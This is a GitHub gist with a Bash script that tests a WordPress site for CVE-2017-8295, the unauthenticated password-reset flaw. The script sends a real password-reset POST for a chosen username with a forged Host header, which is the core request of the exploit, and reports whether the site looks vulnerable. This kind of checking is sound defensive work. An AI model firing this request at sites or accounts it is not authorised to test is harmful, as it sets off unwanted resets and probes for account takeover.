Last active
February 26, 2018 04:35
-
-
Save stevegrunwell/4a8f1990972b3570b3e423533b318aac to your computer and use it in GitHub Desktop.
Simple Bash script to test against https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env bash | |
# | |
# Check a WordPress domain against CVE-2017-8295. | |
# https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html | |
# | |
# Usage: | |
# ./wordpress-host-check <domain> <username> | |
# | |
# <domain> | |
# The WordPress domain you wish to check. For example, http://example.com. | |
# | |
# <username> | |
# The WordPress username you wish to attempt a password reset for. | |
# | |
# Author: Steve Grunwell (https://stevegrunwell.com) | |
# Link: https://stevegrunwell.com/blog/keeping-wordpress-secure/ | |
# License: MIT | |
echo -e "\nAttempting to reset the password for '$2' on $1:"; | |
RESPONSE=$(curl --write-out %{http_code} --silent --output /dev/null \ | |
-X POST "$1/wp-login.php?action=lostpassword" \ | |
-H 'cache-control: no-cache' \ | |
-H 'content-type: application/x-www-form-urlencoded' \ | |
-H 'host: example.com' \ | |
-H "origin: $1" \ | |
-H "referer: $1/wp-login.php?action=lostpassword" \ | |
-d user_login=$2) | |
# A 302 response indicates the user was redirected to the confirmation screen. | |
if [ "$RESPONSE" == "302" ]; then | |
echo -e "> Uh oh, it appears that $1 may be vulnerable!\n" | |
else | |
echo -e "> Good news! $1 appears to be safe from this exploit.\n" | |
fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment